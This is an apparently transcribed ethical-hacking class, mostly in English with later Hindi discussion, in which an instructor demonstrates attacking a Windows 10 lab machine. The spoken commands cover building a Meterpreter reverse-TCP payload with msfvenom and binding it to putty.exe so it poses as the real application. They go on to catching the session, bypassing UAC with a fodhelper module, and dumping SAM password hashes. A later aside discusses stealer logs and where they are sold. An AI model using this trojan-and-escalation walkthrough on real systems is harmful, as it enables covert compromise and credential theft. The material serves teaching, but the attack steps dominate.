So in the last class, we looked at how to attack on the Windows 10 operating system. Okay. So at that time, I created a payload. That payload is not showing any particular application. When a victim is going to double click on a particular payload, it only execute the file and something is running behind the operating system, the malicious file. But how if I tell you that we will able to bind a payload with an original exe? That means suppose that there is an application I have. I am an attacker, I have an application. I want to bind that application with the malicious file and create a payload. So at that time, when I send the payload to the victim's end, that payload look like an application. When it open that application, it will open the similar application over there. If he want to work on that application, he can able to work on that application also. But in the backend, the payload is running on. So this is also possible. So today I will show you how to bind a payload with an original exe. Okay. Uh, in this scenario, I will show you with the putty application. You know the putty application? This is the putty application. Okay. I'm just taking an example. So this is a putty application. I'm going to show you if an attacker open this putty.exe. So the application will open, but in the backend, the payload will run and the machine will go out infected. It will open a backdoor so that attacker can able to do the remote code execution. Okay. So for that one, I'm starting my machine. Okay. cd/home/kali rm payload.exe, and I have a application putty.exe over here. This application would not be run in Linux operating system because executable file does not support by the Linux operating system. I download this application so that I will able to bind up payload with this application and send to the victim's end. Okay. So our first task to create a payload. And at the time of creating the payload, I will use this application and bind this application with the payload. And then the payload which would be created, that is look like an application. So command is same msf vinum command. Msf vinum space -a space So MSF Linux space hyphen A means type of architecture, then hyphen platform, that is Windows, then hyphen X means by which application you want to bind, putty.exe, hyphen K space hyphen T means which payload you want to use. I am using Meterpreter reverse TCP. Then, so local host is, let me check. So 31.27. Okay. So local host is 31.27. Then L port 4444, that is fine. Hyphen E means which exploit you want to use. So I am using x86 Shikakada. This exploit I am going to use space hyphen I1 space hyphen F. What is the extension? That is exe hyphen O. What you want to um, provide the name to the payload. So I provided payload.exe. Okay. So this is the whole command by which I am going to create a payload. Okay. It is creating the payload. It will take 1 minute to create the payload. Okay. Payload created. Okay. Now I am running my HTTP server over here and open the browsers in my Windows 10 operating system, and I will access the data through browser. So the IP address of the Kali Linux machine 192.168.31.27. Downloads. In this payload.exe here. Downloaded. Downloads. Oh, sorry. Downloads payload.exe. Now see the icon of this payload.exe. If I double click on this, it opens the application. So just a actual application. It look like the actual application, and I am using a simple command by which I am actually running this payload. Okay, so if a programmer is going to create a full strength payload with binding with an application, so there is a programmer who built that payload so that it will execute formally, and it will bypass the antivirus also. Okay. My payload is a normal payload. I'm only showing you how dangerous the payload actually there is if someone is actually downloading any application from the third party um, website, which is not authenticated or authorized by a vendor or a genuine person or a genuine organization. Then it is very risky to download a payload, download application from the internet. So that's why every time we are saying, mean ethical hackers are telling to the employees and the persons who are actually using the systems or they are connected to the internet, we are actually telling to the cyberspace persons that kindly download any particular application or software through a genuine website. Okay, now I downloaded it. Now my task is to attack on the machine. So for attacking the machine, same task. MSF console for starting the Metasploit framework. So I got the console, I got the prompt. Now, first of all, we have to define the exploit. Okay. So for defining the exploit, command is use, then exploit multi handler. So this exploit I'm going to use in previous class also, I used the same exploit. Okay. Then after that, we have to use the payload, set payload Windows slash Meterpreter slash reverse TCP. I pressed the tab button, so that's why it took some time. Reverse TCP. The payload Windows Meterpreter reverse TCP. With the help of this Meterpreter, if I attack on the victim's machine, if I got the remote code execution, then it will give me the Meterpreter shell. Okay. Then options command. It is asking to set a L host. So set L host, that is my own IP address 192.168.31.27. Okay, again options command. Okay, it set the L host properly. Now our task is to do the exploit. Okay, my all the settings has been completed. Now I am running the command exploit. And I'm returning back to the Windows operating system. And suppose that he is running this payload. So here, got the Meterpreter. Okay. So that means attack has been succeeded. So I already showed you the command. What are the commands we can able to run over there? We had check that suppose that I run the command ls, so it is showing all the data of my Windows machine. And if we are attacking on a machine with the help of Metasploit framework, it will not ask you the username or password directly. Attack on the machine and get you the shell. And if you want to get a shell, just run the command shell. You will get the shell. Then after that, I showed you so many commands like how to fetch the system information, how to shut down the machine, file uploading, file downloading, keylogger, how to use the keylogger, how to share the screen, all things. Okay. Now there is one more thing, that is privilege escalation. So privilege escalation, if I want to check it, get privs. So my privilege right now, these privileges are with me. By these privileges, the particular attacker is attack on the victim's machine. So two types of privileges are being there in Metasploit framework. First is horizontal privilege. Second one is vertical privilege. Horizontal privilege means when an attacker is going to attack on the victim's machine, then who am I? Who am I? Okay, SHU double shell. Who am I? So I am a victim. So horizontal means when the hacker is going to attack on a machine and he will get a Meterpreter shell, but with the guest permissions. So this is the guest user or a local user. Victim is a local user. So in this time we didn't get the privileges of administrator. So when we got the vertical privileges, so at that time attacker is actually directly accessed with the administrator user. So in this time I am actually attacked with the victim's machine with the privilege of guest user. And these privileges are given to us. Okay. I'm running a command. Okay, nothing. So privilege escalation got you. These are the privilege by which privilege the attacker is actually going to get the Meterpreter shell over here. So at this time I get the shell with the guest user. If I run the command get system, get system. So these privileges are being provided to us. Okay. So there are 6, 7 privileges are here, and when I get the privileges, five privileges are showing over here. Okay. So like this, I got the Meterpreter. There is a way of attacking by which we can able to bypass the UAC. Okay. Bypass the UAC. What is exactly the UAC means? UAC means whenever you open a particular application or a command prompt or any particular application, it asks you whether you want to run or not, yes or no, in Windows operating system. So that is actually demanding you for the administrative privilege. See here, I am closing this application from here, and suppose that I want to access this command prompt with run as administrator. This is known as user account control, UAC. So it is asking a vertical privilege by us, by the operating system, so that he will able to provide the administrative privilege. This is known as UAC. So when you run a software, it asks you run or yes in this UAC. So the UAC is disabled. So when the UAC is disabled, we got the guest privilege access. And if we bypass the UAC, then I will access the administrator privileges and got the vertical privilege access to our victim's machine. Okay. So if I want to hack uh, the victim's machine by bypassing the UAC, there is a method. So I'm trying to do that method so that I will able to bypass the UAC, but it is not 100% surety that I am able to bypass it. Okay. I'm trying to do that one. So what is the exact method is, first of all, I have to create a payload again, and that is a simple payload. Okay. So for creating a simple payload, first of all, rm, I deleted the old payload. Then with the help of MSF Venom. So right now what I'm going to do, I am creating a payload. And why I am again creating a payload? So that I am going to attack on the victim's machine by administrator privileges, means vertical privileges. Okay, I'm trying to do that one. So hyphen P, mm, Windows Meterpreter reverse TCP hyphen E, which exploit I am going to use, x86 Shikagadana, then hyphen I 5, then the lhost. Lhost is my 31.27, then lport hyphen f, this type of payload I want, .exe, then name of the payload is payload.exe. Payload created. Then I am running my HTTP service. I start my HTTP server over here. Go to the victim's machine. I am actually deleting the old payload from here and again download the payload.exe file. Okay. So I got the payload.exe. Now I break this HTTP server and run the command msf console. So for bypassing the UAC, first of all, we have to attack on the victim's machine with the normal method. Normal method means by the exploit that previously I used, multi-handler, by the payload which we are used previously, Meterpreter reverse TCP, and we attack on the victim's machine by horizontal privilege. Then after that, we will use some other exploit to get the vertical privilege over there. So first of all, I run the command use exploit multi handler. This exploit I am using. Then after that, set payload Windows Windows Meterpreter reverse TCP. Okay. Then after that, options command, I have to set the lhost, set local host, that is 192.168.31.27. Okay. Okay, I set the lhost and then exploit. Then if this payload is being executed by the victim, I got the Meterpreter shell. Okay. But if I get this Meterpreter shell, get privs. Okay. That these 5 privileges are there. Okay. Now, what I am actually I want to bypass the USC. So for bypass the USC, there are so many exploits are there. Uh, Com hijack exploit is there through which we can able to bypass the USC. Mm, we also have uh, so I'm going to use bypass USC Ford helper. Okay. I'm not going to use the com hijack technique or the com hijack exploit. Okay, with the com hijack exploit is also we can able to use, that is bypass USC com hijack. But most of the time when I use the bypass underscore com hijack exploit, it will not actually provide me a vertical privilege. So I'm going to use bypass USC Ford helper. So what we have to do, uh, get UID. So this is the identification, that is victim. Okay. Now what I'm going to do, see carefully. I am in the Meterpreter. So I'm not good. I got the shell. Okay. I got the Meterpreter shell. That means I successfully attack on the Windows machine. It is showing each and every data of the victim's machine. But I am not exiting from this particular Meterpreter shell. What I am going to do, I am running a command back background background. So if I run this command, what will happen? This Meterpreter, whatever I got, the remote code execution, it will run in the background. Ground. Ground. Now see where I am. I am in the multi-handler exploit. But the Meterpreter shell is not exited. It is actually, it provides a session ID, that is session 1, and it is running in the background. So I actually runs the Meterpreter in the background, which is my horizontal privilege. Now I want a vertical privilege. So for the vertical privilege, first of all, I'm going to change my exploit and I'm going to use exploit Windows local bypass USC underscore code helper. This one. There are more exploits are also there, like com hijack is also there. But most of the time when I run the com hijack, it is not actually provide me the vertical privilege. I'm trying to do the UAC bypass with the help of code helper. So I use this exploit, which is exploit Windows local bypass UAC code helper. Okay. Now, if I check the sessions, so session one is over here. Okay. Set session one. Um, I I think I also have to set the payload also. Let's see. Set payload win Windows um, XSST core uh, Meterpreter. No. Mm, mm, okay, let's see. Set session one. Session one is there. Exploit. Okay. Started reverse TCP handler. UAC is enabled. Part administrator group continuing. UAC is set to default. Bypass. UAC can bypass this setting continuing. Configuring payload and stage registry keys. And executive payload sending the stage. Right now, where I am, get UID. Victim is there, but what is my location is. Okay, first of all, I am checking get trips. Now see how many privileges I got. At that time, it only showing 5 privileges. Now it is showing so many privileges. So that means I am successfully done the UAC bypass. I got the administrator privilege. That means vertical privilege. I got the vertical privileges. Okay, I'm trying one more command, hash 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 dump hash dump. See, when I run the hash dump command, see it is showing the SAM file information over here. Clearly, it is showing the SAM file contents. Why? Because I got the vertical privilege. I got the access by administrator user. Okay. Um, mm, get system command, get system via technique name pipe information memory admin. Okay. Okay. One more thing I am going to check it. I am moving to the shell and I am running the command diskpart disk part. I'm disk part. If suppose that I run the command disk list space disk. Okay. List disk disk. See, it is showing 50 GB of partition is there. So I'm also able to check the partitions. If I able to check the partition, then I'm also able to do more thing in the partitions also. Okay. So this is how we done the exploit by got the vertical privileges. So we got more privileges than earlier one. Okay. At that time, if I run the hash done command, it cannot be run. When I run the get privs command, it is only showing 5 privileges over there. Okay. And fine. So, do you have any doubt regarding these attacks? First attack I showed you, which is a simple payload. We done the horizontal privilege attack. At that time, we got a shell, and I showed so many commands what we can able to do. Then, second thing, today I showed you how to create a payload by binding with a application. Then after that, right now I showed you how to get the vertical privilege so that you can be the part of administrator privileges when you get the Meterpreter shell. So any doubt regarding these 3 attacks, you can ask me.
सर डाउट तो ऐसा कुछ है नहीं, बट मेरे को ना अभी थोड़ा समझ नहीं आ रहा है ये वाला पार्ट पूरा, जो सिस्टम हैकिंग वाला पार्ट होना
ये
कल और आज,
बात ये,
तो
ये
बहुत ज्यादा
पार्ट थोड़ा ना
कंफ्यूजिंग हो रहा है।
है बेटा। ये टफ है। रुको मैं फिर से तुमको बताता हूँ इसको करना कैसे। ठीक है, मैं फिर से बताता हूँ, ध्यान से देखना।
बेसिकली सर मुझे कल भी मैंने कोशिश करी कल समझाऊं, बस ऊपर ऊपर का समझ आया, कल का भी मेरे को अच्छे से नहीं आया समझ में। मतलब समझ आ रहा है चल क्या रहा है, बट ये नहीं समझ आ रहा है क्यों और कैसे हो रहा है,
बता
प्रॉपरली
रहा
नहीं
हूँ।
आ रहा है।
एग्जिट कमांड भी नहीं चल रहा है, बाय कमांड भी, बाय लूप्स। ये तो क्या हो गया? क्यू यू आई कमांड क्यों नहीं ले रहा है? कंट्रोल सी भी नहीं ले रहा है, क्यूट भी नहीं ले रहा है, एग्जिट भी नहीं ले रहा है। चल कोई बात नहीं, नहीं ले रहा है तो हम यहाँ से बंद कर देते हैं इसको, यहाँ से ले लेते हैं।
पूरा
क्या
एग्जिट
करें?
ही कर देते हैं, नया
हाँ
पेज
क्या,
खोल।
हाँ क्या करें, नहीं चल रहा है, कोई बात नहीं। अब देखो, मैं एक बार हिंदी में समझा देता हूँ, ठीक है? मैं बार से इंग्लिश में समझा चुका हूँ, मैं एक बार हिंदी में समझ। इसमें सबसे पहला टास्क है पेलोड क्रिएट करना। ठीक है, हम लोग स्टार्ट करेंगे पेलोड करने से। पेलोड क्यों क्रिएट कर रहे हैं? पेलोड इज अ वायरस। ये एक वायरस है, एक मेलिशियस फाइल है। ठीक है, इस पर्टिकुलर पेलोड फाइल का काम है कि ये बैकडोर ओपन करके देगा विक्टिम्स के मशीन में। ठीक है, विक्टिम के मशीन में ये ओपन करके देगा मेरे को। तो इसको भी मैं यहां से डिलीट कर देता हूं। इसको क्या हो गया? ये भी डिलीट नहीं होगा। चलिए कोई बात नहीं, चलो कोई नहीं, ना हो डिलीट, हम इसका नाम कुछ और रख लेंगे। ठीक है, तो सबसे पहला टास्क है हमको पेलोड क्रिएट करना है। रियल सिनेरियो में क्या होगा, ये पेलोड एक प्रोग्रामर क्रिएट करेगा। तो वो प्रोग्रामर को अटैकर जो है अपने रिक्वायरमेंट्स बता रही है, हो सकता है उसकी टीम में ही हो, उसकी 4-5 लोगों की टीम हो, उसमें से एक अच्छा प्रोग्रामर होगा, उससे पेलोड क्रिएट करवाएगा। यहाँ पर मैं इस msf विनम कमांड से पेलोड क्रिएट कर रहा हूँ, ठीक है। ये msf विनम कमांड से ये पेलोड क्रिएट कर रहा हूँ। अब ये पेलोड जो है मेलिशियस फाइल है, तो अगर मैं ये मेलिशियस फाइल किसी ऐसे ऑपरेटिंग सिस्टम पे स्टोर करूंगा जिसमें पहले से ही एंटीवायरस रन कर रहा होगा, या अपडेटेड एंटीवायरस रन कर रहा होगा, या विंडोज अपडेट रन कर रहा होगा, तो वो इस वायरस को या तो ऑटोमेटिकली डिलीट कर देगा या रन नहीं करने देगा, ठीक है। तो मैं एक मेलिशियस, और आप ये मान लो एक वर्नेबल विंडोज 10 ऑपरेटिंग सिस्टम यूज कर रहा हूँ। मैं देखूंगा अपने पास, अगर मेरे पास इसका लिंक होगा तो मैं शेयर कर दूंगा, आप लोग डाउनलोड कर लेना ये विंडोज 10 का इमेज। तो इसको जैसे ही मैं, ये कमांड मैंने चलाया, ठीक है, इस कमांड का काम है पेलोड को क्रिएट करना, वायरस क्रिएट करना। तो मैं ये वायरस क्यों क्रिएट कर रहा हूँ? क्योंकि मेरे पास है नहीं तो मैं प्रोग्रामर से ले लूंगा ये पेलोड और उसको डायरेक्टली किसी भी तरीके से विक्टिम की मशीन पे सेंड कर दूंगा। अभी मैं क्या कर रहा हूँ, खुद एक पेलोड क्रिएट कर रहा हूँ, उसके बाद इस पेलोड को मैं सेंड करूंगा विक्टिम की मशीन पे। ये मैंने पेलोड, अरे गलत जगह बना दिया, कहाँ बनाया है, ये बनाया ना, cp स्पेस पेलोड स्लैश होम स्लैश खाली, यहाँ डाल देते हैं cd स्लैश होम स्लैश खाली, ये पेलोड दिखा रहा है, ठीक है। अब ये पेलोड मुझे यहाँ मिल गया है। अब इस पेलोड के थ्रू मुझे अटैक कराना है। सबसे पहले ये पेलोड मुझे सेंड करना पड़ेगा, गलत ना, ये पेलोड मैंने रिमूव करो, पेलोड 2.exe बना लेता हूँ, ठीक है, क्योंकि वहां पे पुराना पेलोड पड़ा है और रिमूव नहीं हो रहा है, तो मैं यहाँ से नाम चेंज कर देता हूँ।
सर आरएम से क्या
कौन?
हुआ, प्लेलोड से?
हम्म
आरएम प्लेलोड से क्या हुआ सर, आरएम कमांड से?
वो मैंने डिलीट किया है ना, जो पुराना पेलोड बना बना हुआ था ना, इसको डिलीट कर दिया मैंने, अब नया बना दिया पेलोड।
ओके सर।
पेलोड पेलोड 2 से बना लिया, ये एक नया मैंने बना लिया, ठीक है। अब मेरा टास्क है इस पेलोड को मुझे विक्टिम के एंड पे भेजना है। मैं क्या यूज कर रहा हूँ तरीका, मैं एक एचटीटीपी सर्विस यहाँ पे स्टार्ट कर रहा हूँ शेयरिंग कराने के लिए। तो इस टाइम पे यहाँ पर मेरे काली फोल्डर के अंदर जितना भी डेटा है ये शेयर हो गया है लैन पे। ये वैन पे शेयर नहीं होता है, सिर्फ लैन पे शेयर होता है। और कैसे होगा? ब्राउजर के थ्रू होगा, क्योंकि एचटीटीपी के थ्रू किया है। यहाँ पर मैं पेलोड 2 देख लेता हूँ, ये रहा पेलोड 2, इसको मैं डाउनलोड कर लेता हूँ। जी मेरा डाउनलोड हो गया, ठीक। तो अभी 2 टास्क हुए हैं। एक टास्क ये हुआ है कि अटैकर ने एक पेलोड क्रिएट करवा लिया डेवलपर से, और दूसरा टास्क कंप्लीट हो गया कि वो पर्टिकुलर पेलोड जो डेवलप कराया था वो विक्टिम के एंड पे पहुंच गया है। 2 काम हो गए मेरे, ठीक है। अब मेरा लास्ट काम, मुझे अटैक करना है विक्टिम के मशीन पे। अटैक करने के लिए यूज होगा मेटास्प्लॉइट फ्रेमवर्क। एमएसएफ कंसोल कमांड के थ्रू मैं मेटास्प्लॉइट फ्रेमवर्क को स्टार्ट करूंगा। तो ये तीसरा स्टेप है। पहला स्टेप पेलोड क्रिएट करना, दूसरा स्टेप पेलोड को सेंड करना। अब ये तीसरा स्टेप है जहां पर मैं अटैक परफॉर्म करूंगा। ठीक है, अटैक परफॉर्म करने के लिए सबसे पहले मुझे कोई ना कोई एक्सप्लॉइट यूज करना पड़ेगा। यूज एक्सप्लॉइट मल्टी हैंडलर, ये एक्सप्लॉइट में यूज करता हूँ। तो एक्सप्लॉइट मैंने आपको पहले ही बताया, एक्सप्लॉइट का काम है कि बैकडोर, जो भी बैकडोर है, जैसे पेलोड वहां पहले से पड़ा हुआ है, तो उस बैक एक्सप्लॉइट करना, ये काम एक्सप्लॉइट का है। इस एक्सप्लॉइट के थ्रू करूंगा। फिर मुझे सेट करना है पेलोड को, और पेलोड में यूज कर रहा हूं विंडोज। जो पेलोड मैं यूज कर रहा हूं, पेलोड क्या है? पेलोड इज अ प्रोग्राम विच इज प्रोवाइडिंग अ बैकडोर टू अ मशीन। तो वहां वो पेलोड बना हुआ है। उस पेलोड को बनाने के लिए हमने क्या यूज किया था? लोकल होस्ट की आईपी यूज करी है। तो लोकल होस्ट की आईपी यूज करने के लिए मेरे को यहाँ पेलोड कौन सा यूज करना पड़ेगा? विंडोज मीटरप्रीटर शेल चाहिए मुझको, और वो रिवर्स टीसीपी पे है, जो कि आप अटैकर की खुद की आईपी के एड्रेस पे चलता है। ऑप्शंस कमांड से मैं देखूंगा यहाँ एल होस्ट मतलब लोकल होस्ट, मेरा खुद का अटैकर मशीन आईपी एड्रेस अभी डिफाइंड नहीं है। तो सेट 192.168.31.27 ये सेट कर दिया। क्या हुआ? अच्छा, सेट एल होस्ट सेट हो गया। ऑप्शंस लाया, ये भी सेट हो गया। मेरा अटैक भी कंप्लीट हो गया है। ठीक है, मुझे अटैक में जो भी स्टेप्स फॉलो करने थे वो भी कर लिया मैंने। एक्सप्लॉइट भी चूज कर लिया, पेलोड भी चूज कर लिया, लोकल होस्ट भी डिफाइन कर दिया। अब मेरा काम है एक्सप्लॉइट करना। एक्सप्लॉइट करने के लिए मैंने रन किया कमांड एक्सप्लॉइट यहाँ पे, और मैं वेट कर रहा हूं कि कब विक्टिम जो है वहां पर मेरे पेलोड को यूज करेगा। तो ये मेरे पेलोड को इसने मान लो यहाँ से रन कराया। ठीक, पेलोड जैसे ही वहां पे रन हुआ, पेलोड ने बैकडोर दिया या मीटरप्रीटर शेल मिल गया। अटैक कंप्लीटेड। अब मैं जो भी काम कर रहा हूं ये आपके उस मशीन का शो कर रहा है सब कुछ। क्लियर हुआ? अब कोई डाउट है? 3 स्टेप्स में फॉलो किया है। पहले पेलोड क्रिएट किया, फिर पेलोड को सेंड किया विक्टिम एंड में, फिर लास्ट स्टेप में अटैक कंप्लीट कर दिया।
सर सेंड तो किया, बट उसमें भी क्या नाम है, विक्टिम ने डाउनलोड किया है ना वो वाला वो
नहीं
फाइल।
नहीं, ये तो मैंने मेथड यूज किया है तुम लोग को दिखाने के
ओके
लिए।
ओके।
ठीक है, इन अ लाइव सिनेरियो what that how attacker is going to send the payload file to the victims end by sending the phishing mails, by sending spam notifications,
मेल्स
by
मैसेजेस
sending
नोटिफिकेशन।
notification, by sending any particular message or the barcode in the WhatsApp, any image file in the WhatsApp. You know that the image file is also dangerous. If you are getting any image
यस
file
सर।
from the unknown number, do not open that file. That is also a backdoor which will open your device, and it will exploit by the attacker. So there are
यस
so
सर,
many
आया था।
so many things are there. So so at that type, the attacker will send the payload to the victim end, and whenever the victim click on that particular malicious thing, it will open the back door and the attacker will able to access it. This is the
ओके
method.
सर, पर एक बात कुछ अलग से इसे हट के पूछूं।
हम्म,
एक बार क्या हुआ था, 6-7 महीने पहले मेरी सारी आईडी समहाउ किसी कहीं और एक्सेस मिल गया था, मतलब हर जगह से कहीं ना कहीं लॉगिन हो रखी थी अदर कंट्रीज में से। एंड वो मुझे पता नहीं लगा कि कैसे होगी, क्योंकि मैंने कहीं पर भी कुछ डाला नहीं था अपना पासवर्ड ऐसे, जो क्योंकि मुझे पता है कि कहाँ डालना चाहिए कहाँ नहीं पे। बट उसके बाद भी स्टिल इट गॉट अटैक्ड समहाउ। एंड
हम्म,
वो मुझे बहुत टाइम बाद पता चला था, मे बी 3 to 4 days के बाद। मतलब मेरी जितनी भी ईमेल्स हो गई, जितने भी लॉगिन्स हो गए एप्लीकेशंस के, डिस्कॉर्ड, यूट्यूब, जीमेल, गूगल एंड माइक्रोसॉफ्ट आईडी वगैरह की आईडी, मतलब सब एक तरीके से एक्सप्लॉइट हो गई थी।
तो मैं कैसे पता
और
चला कि एक्सप्लॉइट हो गया है?
वो जब मैंने देखा ना अपना एक बार मैंने अपना मेल खोल के चेक किया था कि वहां पे मेरी तरफ से मेल सेंड हो रखे हैं बहुत सारे मेरे, मतलब जितने जहां से रिसीव हुई है। मैं डिस्कॉर्ड खोला अपने दोस्त से बात करने के लिए, तो उसमें मतलब मेल, वो मैसेजेस और लिंक एंड फोटोज वो सब भेज रखी थी। और जो ईमेल का मुझे पता चला, ईमेल मेरी लॉग आउट हो रखी थी। एंड टेलीग्राम जो कि मेरा नंबर से लिंक है उसमें भी कहीं और से लॉग इन हो रखा था, वो भी मैंने चेक किया तो मेरा लॉग आउट हो रखा था वो टेलीग्राम।
समझ गया, मैं समझ गया।
तो सर एक और चीज, जैसे डिस्कॉर्ड था ना, उस
हम्म
पे सबको लिंक्स भेज रखी थी, लिंक्स एंड फोटोज। वो
हम्म
वो अलग बात है, डिस्कॉर्ड पे मेरे ज्यादा कुछ अभी है नहीं फ्रेंड्स जो, और है भी वो खोलेंगे नहीं। तो वो लिंक वो मैंने सबके में से डिलीट करी थी, कम से कम 15-20 फ्रेंड्स मेरे, उन सब पे स्पैम कर रखी थी वो लिंक एंड फोटोज, एंड थ्रू मेल्स ऑल्सो। एंड इसमें एक चीज ये भी होती है ना, कि अगर किसी नोन का, अगर आपका नंबर है, फोन या ईमेल आईडी हैक हो जाती है, वो अगर आपको भेजे, वो तो आपको पता है नोन है वो चीज, नोन पर्सन है, तो आप उसकी तो बिना सोचे समझे कि यू फोटो लिंक और फोटो तो देख ही लोगे आप, तो उसके थ्रू भी तो हैक हो सकता है ना वो चीज
अपनी
तो।
अपनी ईमेल आईडी बताओ जो तुमको लग रहा था हैक हो गई है।
YASH।
सेंड कर दो मुझे, इस पे सेंड करो, चैट
किस
में
पे?
सेंड करो
मैसेज पे? ओके
हाँ
ओके
हाँ,
सर।
इस पे मैसेज पे सेंड करो।
ये है सर।
ये देखो भैया, देख रहे हो?
हम्म।
और तुम्हारे ही है।
यस सर।
तो तुम समझ लो भैया कि डार्क वेब में तो सारे पासवर्ड लीक है तुम्हारे। और
ये तो सर बहुत पुराना है, अभी तो मैंने अपडेट कर लिया है 2-3 बार और।
नहीं तो वो तुमने अपडेट कर लिया वो तो ठीक है, अच्छी बात है, मगर लीक हो रखे हैं तुम्हारे।
बट पता
और
नहीं सर कैसे, क्योंकि मैं कहीं पे भी ऐसे डालता नहीं हूँ रैंडमली कि कहीं पे कुछ भी डाल दूं।
और ये मुझको स्टीलर लॉग, अरे यार तुम पे कोई एप्लीकेशन इंस्टॉल हो गया था क्या, स्टीलर लॉग?
एप्लीकेशन? नहीं सर, रैंडमली एप्लीकेशन तो एप्पल स्टोर से ही करता हूँ। एंड्रॉयड भी नहीं है मेरे पास तो कुछ और अलग से मैं इंस्टॉल कर भी नहीं सकता।
स्टीलर लॉग, देखो ये स्टीलर लॉग का डेटाबेस भी है। पहले तो इसमें
मेरा
कुछ
सर
थी।
डेटा उस टाइम पे लीक हुआ था जब हर सबका लीक होता ना डेटा, हर पर्सन का, उस टाइम पीरियड में हुआ था मेरा भी शायद, मे बी।
Stealer log are organized data set of sensitive information stolen from compromised devices by specialized malicious software non-info stealer. These logs act as an turnkey breach kit, providing cyber criminal with immediate actionable credential and session data hijack account. Hmm, देख लो भैया ये सारी चीजें हो जाती हैं, कुछ तो गड़बड़ हुआ तुम्हारे डिवाइस में।
सर
स्टीलर लॉग,
एक्सटर्नल
in Steeler, specialized markers place like Russian Market and Exodus allow buyer to search for specific domain or type credential, often selling log as low as $10. Yep. और एक बार नहीं, हर बार स्टीलर लॉक से ही गए हैं तुम्हारे
यस, पता नहीं क्या है पर मुझे समझ नहीं आ
पासवर्ड।
रहा।
वो भी एक का नहीं है, कई का है।
यस सर, कहीं का वो
ये
एक साथ मेरा हुआ
ये
था।
ये ईमेल आईडी तुम जितने अकाउंट पे चला रहे हो ना, ये
जी।
सब पे हो गया। तुम एक काम करो, चेंज कर दो, हर अकाउंट की ईमेल आईडी बदल दो।
ईमेल
अगर
आईडी बदल दूं कि पासवर्ड बदलूं सर?
हाँ ये बात तो सही है यार।
क्योंकि सर
नहीं
ये अकाउंट में भी लॉगिन है ना मेरी, मतलब बैंक अकाउंट में भी लॉगिन है, मतलब ज्यादातर ये मेरी मेन ईमेल आईडी है।
तो गड़बड़ हो गया है, ये ईमेल आईडी तुम्हारा एक्सपोज हो गया है ये। मगर पासवर्ड इसका दोबारा स्टील, अब कितने दिन हो गए इस बात को?
ये सर उस टाइम पे लीक हुआ था जब सबका डेटा लीक हो रहा था ना,
नहीं
एकदम
तो
से सबका डेटा लीक होता है।
कितने मंथ पुरानी बात है ये?
मे बी 5 to 6 month हो चुके हैं सर।
उस समय से कोई लास्ट पासवर्ड यहाँ दिखा रहा है, उस समय का कोई
नहीं
लास्ट
नहीं
पासवर्ड?
नहीं, उस टाइम से नहीं, नहीं है सर, नहीं है।
नहीं है।
नहीं, क्योंकि सर मैंने हर जगह से जितनी भी आईडी, सबके 2-2 3-3 बार पासवर्ड दोबारा चेंज करते मैंने, उसके बाद ही जब मुझे पता लगा था ये सब हो रहा है। मैं सोचा हुआ कैसे, कि मैंने ना कोई एप्लीकेशन डाली, ना मैं कोई एक्सटर्नल लिंक पे जाता भी हूँ, क्योंकि मुझे पता है एक्सटर्नल लिंक अगर कोई सही है या नहीं, एच टी
भाई
टी पी
देखो,
एस वाली पे जाता।
ऐसे तो मेरा भी एक बार हुआ है, ये देखो, ठीक है, मगर मेरा बहुत साल पहले हुआ है, और वो भी कहाँ हुआ था?
बिग बास्केट में आपने दिखाया था सर,
बिग
जब
बास्केट
बिग
में हुआ
बास्केट
है।
का डेटा लीक हुआ था तब हुआ था आपका
तो
भी लीक।
2021 में हुआ था, उसके बाद से कभी नहीं हुआ है। एक ही बार हुआ था, बिग बास्केट से हुआ था। मगर वो तो पूरा डेटाबेस पे ही अटैक हुआ था, तो मेरा अकेले का नहीं गया था, सबका चला गया था।
जी
तो
सर।
ये तो बहुत पुरानी बात है। ठीक है, उसके बाद तो मैं पासवर्ड बदल चुका हूँ कई बार। तो है तो डेंजरस।
सर मतलब हुआ कैसे होगा, मतलब ये नहीं
हुआ
समझ
क्या?
आया।
हुआ क्या, अटैक हुआ है वो?
नहीं, बस
कहीं
जो
किसी,
हुआ मैंने आपको बताया है सर।
उससे कोई फर्क नहीं पड़ता, उसके बाद क्या हुआ उससे मतलब रखो। कैसे हुआ ये तो कभी आप वैसे भी नहीं पता कर सकते हो। वो देख रहे हो, मैंने तुम्हें पूरा दिखाया। वो
हम्म,
स्टीलर लॉक कहाँ से चलता है, वो डार्क वेब में अवेलेबल भी है स्टीलर लॉक, जिसके थ्रू क्या कहते हैं, मिल जाते हैं। बचा के रखो, पासवर्ड बदलते रहा करो हमेशा।
जी
ओके, सो दिस इज अबाउट सिस्टम हैकिंग। ओके,
सर,
सिस्टम
तो फिर
हैकिंग।
उसमें क्या करेंगे जब जैसे किसी अगर नोन का हैक हुआ और वो हमको मैसेज या फोटोज भेज रहा हो, उसको तो हम बिना सोचे समझे खोल ही लेंगे ना सर।
यही तो प्रॉब्लम है। अब फेसबुक में मेरे फ्रेंड्स हैं, ठीक है, एग्जिस्टिंग फ्रेंड्स,
जी
उन्हीं के नाम उन्हीं के फोटो से मेरे पास दोबारा फ्रेंड रिक्वेस्ट आ रहे हैं। आप बताओ क्यों आएगा मेरे पास दोबारा फ्रेंड रिक्वेस्ट? जो फ्रेंड मेरे पे पहले से ही एग्जिस्टिंग फेसबुक में है, वो दोबारा फ्रेंड रिक्वेस्ट क्यों भेजेंगे?
सर,
तो
मेरे साथ ये भी हो चुका
तो
है।
लोग गलती क्या करते हैं, ध्यान नहीं देते हैं, फ्रेंड रिक्वेस्ट एक्सेप्ट कर लेते हैं।
हम्म।
तो वो बहुत बड़ी गलती कर रहे हैं। फ्रेंड रिक्वेस्ट एक्सेप्ट करते ही वो तुम्हारा फ्रेंड बन जाएगा, तुम्हारे सारे दोस्तों का डिटेल वो देख सकता है, तुम्हारी सारे
हम्म।
फोटो देख सकता है, तुम्हारे सारी हिस्ट्री देख लेगा, सब कुछ तुम्हारे बारे में समझ लेगा वो।
हम्म।
बस उसके बाद फिर वो नेक्स्ट स्टेप लेना शुरू करेगा।
सर, मेरे साथ भी ऐसे हुआ है, दोनों केसेस हुए हैं। एक बार मेरी ही फेक आईडी किसी ने बनाई थी 2 से 3 बार, जो कि 2 से 3 बार 5 मिनट के अंदर अंदर बंद हो गई थी। मेरे दोस्त से पैसे मांगे थे और वो बहुत जल्दबाजी में मांग रहा था, तो उसे पैसे करने पड़ गए थे। उसने शायद मेरे 2 to 3 के लिए थे उस टाइम पे।
बहुत छोटे अमाउंट
एंड
मांगते हैं, बहुत छोटे अमाउंट, जो किसी को देने में दिक्कत ना हो। 1,000 रुपए, दो
हाँ,
हजार रुपए ऐसे ही मांगते हैं। मगर
या
